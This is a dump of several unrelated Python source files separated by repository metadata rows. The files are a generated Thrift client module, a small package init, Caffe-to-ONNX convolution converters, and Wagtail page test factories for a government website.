iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_superColumn_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_superColumn_args:
thrift_spec = None
def __init__(self, d=None):
self.batchMutationSuper = None
if isinstance(d, dict):
if 'batchMutationSuper' in d:
self.batchMutationSuper = d['batchMutationSuper']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRUCT:
self.batchMutationSuper = batch_mutation_super_t()
self.batchMutationSuper.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_superColumn_args')
if self.batchMutationSuper != None:
oprot.writeFieldBegin('batchMutationSuper', TType.STRUCT, -1)
self.batchMutationSuper.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_superColumn_result:
thrift_spec = (
)
def __init__(self, d=None):
pass
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_superColumn_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_superColumn_blocking_args:
thrift_spec = None
def __init__(self, d=None):
self.batchMutationSuper = None
if isinstance(d, dict):
if 'batchMutationSuper' in d:
self.batchMutationSuper = d['batchMutationSuper']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRUCT:
self.batchMutationSuper = batch_mutation_super_t()
self.batchMutationSuper.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_superColumn_blocking_args')
if self.batchMutationSuper != None:
oprot.writeFieldBegin('batchMutationSuper', TType.STRUCT, -1)
self.batchMutationSuper.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class batch_insert_superColumn_blocking_result:
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('batch_insert_superColumn_blocking_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 33.573982
| 188
| 0.687835
| 7,838
| 67,618
| 5.643532
| 0.021689
| 0.028033
| 0.030384
| 0.027264
| 0.943799
| 0.924379
| 0.904824
| 0.868585
| 0.847583
| 0.826197
| 0
| 0.004026
| 0.206572
| 67,618
| 2,013
| 189
| 33.590661
| 0.820466
| 0.001982
| 0
| 0.868391
| 1
| 0
| 0.038522
| 0.009634
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13046
| false
| 0.00977
| 0.004023
| 0.055172
| 0.258621
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
03cc3c08df3daf1e61912158bf07ef439f313b1a
| 108
|
py
|
Python
|
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | 1
|
2020-07-27T23:51:44.000Z
|
2020-07-27T23:51:44.000Z
|
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | null | null | null |
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | null | null | null |
from .mydlib import create_catalogue
from .mydlib import create_library
from .mydlib import get_book_libgen
| 27
| 36
| 0.861111
| 16
| 108
| 5.5625
| 0.5625
| 0.337079
| 0.539326
| 0.494382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 108
| 3
| 37
| 36
| 0.927083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
456671a0b9c6d2935eaf0fe836764369156b29ef
| 7,654
|
py
|
Python
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 33
|
2020-06-09T21:05:35.000Z
|
2022-02-24T01:48:45.000Z
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 17
|
2020-07-14T19:44:09.000Z
|
2022-02-10T10:03:01.000Z
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 16
|
2020-06-17T22:56:11.000Z
|
2021-12-21T05:44:32.000Z
|
"""Converters for convolution layers in Keras
"""
import onnx as O
import numpy as np
from . import helper
from .base_layer import Layer
from .exceptions import FeatureNotImplemented, OnnxNotSupport
class Convolution(Layer):
def __init__(self, inputs, outname, layer, proto, blob):
Layer.__init__(self, inputs, outname, layer, proto, blob)
def generate(self):
node_list = []
value_infos = []
# Construct Weights.
w = self.layer.blobs[0].data
wnode_name = self.name + '_weight'
tn, ti = helper.constructConstantNode(wnode_name, w)
node_list += tn
value_infos += ti
self.inputs.append(wnode_name)
# Construct Bias
if self.proto.convolution_param.bias_term == True:
bnode_name = self.name + '_bias'
tn, ti = helper.constructConstantNode(
bnode_name, self.layer.blobs[1].data)
node_list += tn
value_infos += ti
self.inputs.append(bnode_name)
# Construct other params
if self.proto.convolution_param.kernel_w > 0 and self.proto.convolution_param.kernel_h > 0:
kernel = [self.proto.convolution_param.kernel_h, self.proto.convolution_param.kernel_w]
else:
if len(self.proto.convolution_param.kernel_size):
kernel = self.proto.convolution_param.kernel_size[0]
else:
kernel = 1
kernel = [kernel] * 2
if self.proto.convolution_param.pad_w > 0 or self.proto.convolution_param.pad_h > 0:
pad = [self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w, self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w]
else:
if len(self.proto.convolution_param.pad):
pad = self.proto.convolution_param.pad[0]
else:
pad = 0
pad = [pad] * 4
if self.proto.convolution_param.stride_w > 0 or self.proto.convolution_param.stride_h > 0:
stride = [self.proto.convolution_param.stride_h, self.proto.convolution_param.stride_w]
else:
if len(self.proto.convolution_param.stride):
stride = self.proto.convolution_param.stride[0]
else:
stride = 1
stride = [stride] * 2
dilation = self.proto.convolution_param.dilation[0] if len(self.proto.convolution_param.dilation) else 1
dilation = [dilation] * 2
group = self.proto.convolution_param.group
node = O.helper.make_node(
op_type = 'Conv',
inputs = self.inputs,
outputs = self.outputs,
name = self.name,
dilations = dilation,
kernel_shape = kernel,
pads = pad,
strides = stride,
group = group
)
node_list.append(node)
return node_list, value_infos
class DepthwiseConvolution(Layer):
def __init__(self, inputs, outname, layer, proto, blob):
Layer.__init__(self, inputs, outname, layer, proto, blob)
def generate(self):
node_list = []
value_infos = []
# Construct Weights.
w = self.layer.blobs[0].data
wnode_name = self.name + '_weight'
tn, ti = helper.constructConstantNode(wnode_name, w)
node_list += tn
value_infos += ti
self.inputs.append(wnode_name)
# Construct Bias
if self.proto.convolution_param.bias_term == True:
bnode_name = self.name + '_bias'
tn, ti = helper.constructConstantNode(
bnode_name, self.layer.blobs[1].data)
node_list += tn
value_infos += ti
self.inputs.append(bnode_name)
# Construct other params
if self.proto.convolution_param.kernel_w > 0 and self.proto.convolution_param.kernel_h > 0:
kernel = [self.proto.convolution_param.kernel_h, self.proto.convolution_param.kernel_w]
else:
if len(self.proto.convolution_param.kernel_size):
kernel = self.proto.convolution_param.kernel_size[0]
else:
kernel = 1
kernel = [kernel] * 2
if self.proto.convolution_param.pad_w > 0 or self.proto.convolution_param.pad_h > 0:
pad = [self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w, self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w]
else:
if len(self.proto.convolution_param.pad):
pad = self.proto.convolution_param.pad[0]
else:
pad = 0
pad = [pad] * 4
if self.proto.convolution_param.stride_w > 0 or self.proto.convolution_param.stride_h > 0:
stride = [self.proto.convolution_param.stride_h, self.proto.convolution_param.stride_w]
else:
if len(self.proto.convolution_param.stride):
stride = self.proto.convolution_param.stride[0]
else:
stride = 1
stride = [stride] * 2
dilation = self.proto.convolution_param.dilation[0] if len(self.proto.convolution_param.dilation) else 1
dilation = [dilation] * 2
group = self.proto.convolution_param.group
node = O.helper.make_node(
op_type = 'Conv',
inputs = self.inputs,
outputs = self.outputs,
name = self.name,
dilations = dilation,
kernel_shape = kernel,
pads = pad,
strides = stride,
group = group
)
node_list.append(node)
return node_list, value_infos
class Deconvolution(Layer):
def __init__(self, inputs, outname, layer, proto, blob):
Layer.__init__(self, inputs, outname, layer, proto, blob)
def generate(self):
node_list = []
value_infos = []
# Construct Weights.
w = self.layer.blobs[0].data
wnode_name = self.name + '_weight'
tn, ti = helper.constructConstantNode(wnode_name, w)
node_list += tn
value_infos += ti
self.inputs.append(wnode_name)
# Construct Bias
if self.proto.convolution_param.bias_term == True:
bnode_name = self.name + '_bias'
tn, ti = helper.constructConstantNode(
bnode_name, self.layer.blobs[1].data)
node_list += tn
value_infos += ti
self.inputs.append(bnode_name)
# Construct other params
if self.proto.convolution_param.kernel_w > 0 and self.proto.convolution_param.kernel_h > 0:
kernel = [self.proto.convolution_param.kernel_h, self.proto.convolution_param.kernel_w]
else:
if len(self.proto.convolution_param.kernel_size):
kernel = self.proto.convolution_param.kernel_size[0]
else:
kernel = 1
kernel = [kernel] * 2
if self.proto.convolution_param.pad_w > 0 or self.proto.convolution_param.pad_h > 0:
pad = [self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w, self.proto.convolution_param.pad_h, self.proto.convolution_param.pad_w]
else:
if len(self.proto.convolution_param.pad):
pad = self.proto.convolution_param.pad[0]
else:
pad = 0
pad = [pad] * 4
if self.proto.convolution_param.stride_w > 0 or self.proto.convolution_param.stride_h > 0:
stride = [self.proto.convolution_param.stride_h, self.proto.convolution_param.stride_w]
else:
if len(self.proto.convolution_param.stride):
stride = self.proto.convolution_param.stride[0]
else:
stride = 1
stride = [stride] * 2
dilation = self.proto.convolution_param.dilation[0] if len(self.proto.convolution_param.dilation) else 1
dilation = [dilation] * 2
group = self.proto.convolution_param.group
node = O.helper.make_node(
op_type = 'ConvTranspose',
inputs = self.inputs,
outputs = self.outputs,
name = self.name,
dilations = dilation,
kernel_shape = kernel,
pads = pad,
strides = stride,
group = group
)
node_list.append(node)
return node_list, value_infos
| 36.447619
| 156
| 0.66057
| 996
| 7,654
| 4.86747
| 0.080321
| 0.133663
| 0.29703
| 0.371287
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0
| 0.010269
| 0.236608
| 7,654
| 209
| 157
| 36.62201
| 0.819442
| 0.027959
| 0
| 0.934066
| 0
| 0
| 0.007677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032967
| false
| 0
| 0.027473
| 0
| 0.093407
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45be1b8ecbef77934a969801d3fa8baf6e33e2d0
| 34,189
|
py
|
Python
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
import random
import string
import factory
import factory.fuzzy
import wagtail_factories
from django.utils import timezone
from great_international import models
class InternationalSectorPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalSectorPage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
heading = factory.fuzzy.FuzzyText(length=10)
sub_heading = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
heading_teaser = factory.fuzzy.FuzzyText(length=10)
section_one_body = factory.fuzzy.FuzzyText(length=10)
section_one_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
section_one_image_caption_company = factory.fuzzy.FuzzyText(length=10)
statistic_1_number = factory.fuzzy.FuzzyText(length=10)
statistic_1_heading = factory.fuzzy.FuzzyText(length=10)
statistic_1_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_2_number = factory.fuzzy.FuzzyText(length=10)
statistic_2_heading = factory.fuzzy.FuzzyText(length=10)
statistic_2_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_3_number = factory.fuzzy.FuzzyText(length=10)
statistic_3_heading = factory.fuzzy.FuzzyText(length=10)
statistic_3_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_4_number = factory.fuzzy.FuzzyText(length=10)
statistic_4_heading = factory.fuzzy.FuzzyText(length=10)
statistic_4_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_5_number = factory.fuzzy.FuzzyText(length=10)
statistic_5_heading = factory.fuzzy.FuzzyText(length=10)
statistic_5_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_6_number = factory.fuzzy.FuzzyText(length=10)
statistic_6_heading = factory.fuzzy.FuzzyText(length=10)
statistic_6_smallprint = factory.fuzzy.FuzzyText(length=10)
section_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_teaser = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_one_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_two_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_three_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_three_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_three_body = factory.fuzzy.FuzzyText(length=10)
case_study_title = factory.fuzzy.FuzzyText(length=10)
case_study_description = factory.fuzzy.FuzzyText(length=10)
case_study_cta_text = factory.fuzzy.FuzzyText(length=10)
case_study_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_three_heading = factory.fuzzy.FuzzyText(length=10)
section_three_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
class InternationalSubSectorPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalSubSectorPage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
heading = factory.fuzzy.FuzzyText(length=10)
sub_heading = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
heading_teaser = factory.fuzzy.FuzzyText(length=10)
section_one_body = factory.fuzzy.FuzzyText(length=10)
section_one_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
section_one_image_caption_company = factory.fuzzy.FuzzyText(length=10)
statistic_1_number = factory.fuzzy.FuzzyText(length=10)
statistic_1_heading = factory.fuzzy.FuzzyText(length=10)
statistic_1_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_2_number = factory.fuzzy.FuzzyText(length=10)
statistic_2_heading = factory.fuzzy.FuzzyText(length=10)
statistic_2_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_3_number = factory.fuzzy.FuzzyText(length=10)
statistic_3_heading = factory.fuzzy.FuzzyText(length=10)
statistic_3_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_4_number = factory.fuzzy.FuzzyText(length=10)
statistic_4_heading = factory.fuzzy.FuzzyText(length=10)
statistic_4_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_5_number = factory.fuzzy.FuzzyText(length=10)
statistic_5_heading = factory.fuzzy.FuzzyText(length=10)
statistic_5_smallprint = factory.fuzzy.FuzzyText(length=10)
statistic_6_number = factory.fuzzy.FuzzyText(length=10)
statistic_6_heading = factory.fuzzy.FuzzyText(length=10)
statistic_6_smallprint = factory.fuzzy.FuzzyText(length=10)
section_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_teaser = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_one_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_two_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_three_icon = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_two_subsection_three_heading = factory.fuzzy.FuzzyText(length=10)
section_two_subsection_three_body = factory.fuzzy.FuzzyText(length=10)
case_study_title = factory.fuzzy.FuzzyText(length=10)
case_study_description = factory.fuzzy.FuzzyText(length=10)
case_study_cta_text = factory.fuzzy.FuzzyText(length=10)
case_study_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
section_three_heading = factory.fuzzy.FuzzyText(length=10)
section_three_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_teaser = factory.fuzzy.FuzzyText(length=10)
section_three_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
class InternationalHomePageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalHomePage
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
hero_title = factory.fuzzy.FuzzyText(length=10)
# homepage_link_panels is a StreamField
class InternationalArticleListingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalArticleListingPage
landing_page_title = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class InternationalArticlePageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalArticlePage
type_of_article = 'Blog'
article_title = factory.fuzzy.FuzzyText(length=10)
article_subheading = factory.fuzzy.FuzzyText(length=10)
article_teaser = factory.fuzzy.FuzzyText(length=10)
article_image = factory.SubFactory(wagtail_factories.ImageFactory)
article_body_text = factory.fuzzy.FuzzyText(length=10)
cta_title = factory.fuzzy.FuzzyText(length=10)
cta_teaser = factory.fuzzy.FuzzyText(length=10)
cta_link_label = factory.fuzzy.FuzzyText(length=10)
cta_link = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class InternationalCampaignPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalCampaignPage
campaign_teaser = factory.fuzzy.FuzzyText(length=10)
campaign_heading = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
section_one_heading = factory.fuzzy.FuzzyText(length=10)
section_one_intro = factory.fuzzy.FuzzyText(length=10)
selling_point_one_heading = factory.fuzzy.FuzzyText(length=10)
selling_point_one_content = factory.fuzzy.FuzzyText(length=10)
section_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_intro = factory.fuzzy.FuzzyText(length=10)
related_content_heading = factory.fuzzy.FuzzyText(length=10)
related_content_intro = factory.fuzzy.FuzzyText(length=10)
cta_box_message = factory.fuzzy.FuzzyText(length=10)
cta_box_button_url = factory.fuzzy.FuzzyText(length=10)
cta_box_button_text = factory.fuzzy.FuzzyText(length=10)
class InternationalTopicLandingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalTopicLandingPage
landing_page_title = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class fuzzyURL(factory.fuzzy.BaseFuzzyAttribute):
def __init__(self, protocol='https', tld='co.uk', name_length=15):
super().__init__()
self.protocol = protocol
self.tld = tld
self.name_length = name_length
def fuzz(self):
chars = [
random.choice(string.ascii_lowercase)
for _i in range(self.name_length)
]
return self.protocol + '://' + ''.join(chars) + '.' + self.tld
class InternationalGuideLandingPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.great_international.InternationalGuideLandingPage
display_title = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
teaser = factory.fuzzy.FuzzyText(length=10)
section_one_content = factory.fuzzy.FuzzyText(length=10)
section_one_image = factory.SubFactory(wagtail_factories.ImageFactory)
section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
section_two_heading = factory.fuzzy.FuzzyText(length=10)
section_two_teaser = factory.fuzzy.FuzzyText(length=10)
section_two_button_text = factory.fuzzy.FuzzyText(length=10)
section_two_button_url = factory.fuzzy.FuzzyText(length=10)
section_two_image = factory.SubFactory(wagtail_factories.ImageFactory)
guides_section_heading = factory.fuzzy.FuzzyText(length=10)
parent = None
class InternationalCapitalInvestLandingPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.capital_invest.InternationalCapitalInvestLandingPage
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class CapitalInvestRegionPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.capital_invest.CapitalInvestRegionPage
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
featured_description = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
last_published_at = timezone.now()
parent = None
class CapitalInvestOpportunityPageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.capital_invest.CapitalInvestOpportunityPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
hero_title = factory.fuzzy.FuzzyText(length=10)
hero_image = factory.SubFactory(
wagtail_factories.ImageFactory
)
project_background_title = factory.fuzzy.FuzzyText(length=10)
project_background_intro = factory.fuzzy.FuzzyText(length=10)
location = factory.fuzzy.FuzzyText(length=10)
scale = factory.fuzzy.FuzzyText(length=10)
investment_type = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class CapitalInvestRelatedSectorsFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.capital_invest.CapitalInvestRelatedSectors
page = None
related_sector = None
class CapitalInvestOpportunityListingPageFactory(
wagtail_factories.PageFactory
):
class Meta:
model = models.capital_invest.CapitalInvestOpportunityListingPage
breadcrumbs_label = factory.fuzzy.FuzzyText(length=10)
search_results_title = factory.fuzzy.FuzzyText(length=10)
slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
parent = None
class InvestInternationalHomePageFactory(wagtail_factories.PageFactory):
class Meta:
model = models.invest.InvestInternationalHomePage
